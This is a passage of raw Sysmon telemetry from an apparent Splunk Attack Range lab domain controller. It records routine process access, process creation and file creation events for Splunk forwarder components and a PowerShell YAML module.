Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004099Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:32.263{10ACEC4A-8598-5FCF-CE00-000000009101}4720C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004145Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:33.979{10ACEC4A-8599-5FCF-D000-000000009101}41484632C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004144Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:33.823{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8599-5FCF-D000-000000009101}4148C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004143Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:33.823{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004142Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:33.823{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004141Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:33.823{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004140Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:33.823{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004139Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:33.823{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004138Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:33.823{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004137Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:33.823{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004136Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:33.823{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004135Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:33.823{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004134Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:33.823{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8599-5FCF-D000-000000009101}4148C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004133Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:33.823{10ACEC4A-8551-5FCF-3300-000000009101}30803808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-8599-5FCF-D000-000000009101}4148C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004132Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:33.825{10ACEC4A-8599-5FCF-D000-000000009101}4148C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000004131Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:33.605{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Documents\WindowsPowerShell\Modules\powershell-yaml\0.4.2\Load-Assemblies.ps12020-12-08 13:54:33.605 11241100x80000000000000004130Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:33.605{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Documents\WindowsPowerShell\Modules\powershell-yaml\0.4.2\Tests\powershell-yaml.Tests.ps12020-12-08 13:54:33.605 11241100x80000000000000004129Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:33.605{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Documents\WindowsPowerShell\Modules\powershell-yaml\0.4.2\lib\netstandard1.3\YamlDotNet.dll2020-12-08 13:54:33.605 11241100x80000000000000004128Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:33.605{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Documents\WindowsPowerShell\Modules\powershell-yaml\0.4.2\lib\net45\YamlDotNet.dll2020-12-08 13:54:33.605 11241100x80000000000000004127Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:33.605{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Documents\WindowsPowerShell\Modules\powershell-yaml\0.4.2\lib\net35\YamlDotNet.dll2020-12-08 13:54:33.605 10341000x80000000000000004126Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:33.308{10ACEC4A-8599-5FCF-CF00-000000009101}41164576C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004125Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:33.168{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8599-5FCF-CF00-000000009101}4116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004124Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:33.168{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004123Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:33.168{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004122Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:33.168{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004121Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:33.168{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004120Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:33.168{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004119Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:33.168{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004118Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:33.168{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004117Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:33.168{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\